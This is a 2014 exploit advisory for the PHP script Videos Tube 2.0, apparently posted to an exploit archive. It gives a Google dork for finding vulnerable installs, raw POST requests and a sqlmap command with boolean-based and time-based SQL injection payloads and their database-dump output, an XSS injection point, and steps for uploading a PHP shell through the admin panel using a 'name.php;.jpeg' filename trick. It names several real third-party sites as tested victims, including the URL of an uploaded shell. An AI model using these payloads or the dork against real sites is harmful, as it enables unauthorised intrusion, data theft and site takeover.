Videos Tube 2.0 <= (SQL/XSS/Shell Upload) Multiple Vulnerabilities ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG - [+] Greetz to : http://1337day.com - http://milw00rm.com .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ KnocKout, Septemb0x , BARCOD3 , _UnDeRTaKeR_ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ Turkey / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Videos Tube |~Price : FREE |~Version : 2.0, updated the lastest version. |~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html |~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload |~Google DORK : "© 2014, Videos Tube. Tüm Hakları Saklıdır." |[~]Date : "15 KAS. 2014" |[~]Tested on : Kali Linux Tested on Demos; http://demo.phpscriptlerim.com/free/videostube/ http://www.tıger61.com/ http://www.birkovabuziddiasi.com/ http://video.egitimledirilis.com/ ====================== SQL Injection Vulnerability (POST Method) =============== Example; http://demo.phpscriptlerim.com/free/videostube/ Target: http://demo.phpscriptlerim.com/free/videostube/search.php POST :/ search=[SQL Injection]&ara= ------------------------------------------------------------- POST /free/videostube/search.php HTTP/1.1 Host: demo.phpscriptlerim.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://demo.phpscriptlerim.com/free/videostube/search.php Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 16 search=[Post Method SQL Injection]&ara= .. .. ##############Exploitation sqlmap console.########## sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data"=search=&ara=" -p "search" --dbs #################################################### --- Place: POST Parameter: search Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: search=-6400' OR (6785=6785)#&ara= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: search=' AND SLEEP(5)#&ara= --- [01:16:58] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.34 back-end DBMS: MySQL 5.0.11 [01:16:58] [INFO] fetching database names [01:16:58] [INFO] fetching number of databases [01:16:58] [WARNING] reflective value(s) found and filtering out [01:16:58] [INFO] resumed: 2 [01:16:58] [INFO] resumed: information_schema [01:16:58] [INFO] resumed: phpscrip_videostube available databases [2]: [*] information_schema [*] phpscrip_videostube ============================================================================== ============================================================================== ==================Cross Site Scripting Vulnerability ========================= Target: http://demo.phpscriptlerim.com/free/videostube/search.php POST to :/ search=[XSS]&ara= ------------------------------------------------------------- POST /free/videostube/search.php HTTP/1.1 Host: demo.phpscriptlerim.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://demo.phpscriptlerim.com/free/videostube/search.php Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 16 search=[XSS]&ara= ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ============================================================================== ============================================================================== ==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) ======= INFO; performed primarily access the admin panel ; http://www.TARGET.com/yonetim/ then go.. http://www.VICTIM.com/upload/upload.php for bypass shell file name "name.php;.jpeg" and then using tamper data file can be loaded shell was tested! TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php ============================================================= # milw00rm.com [2014-11-15]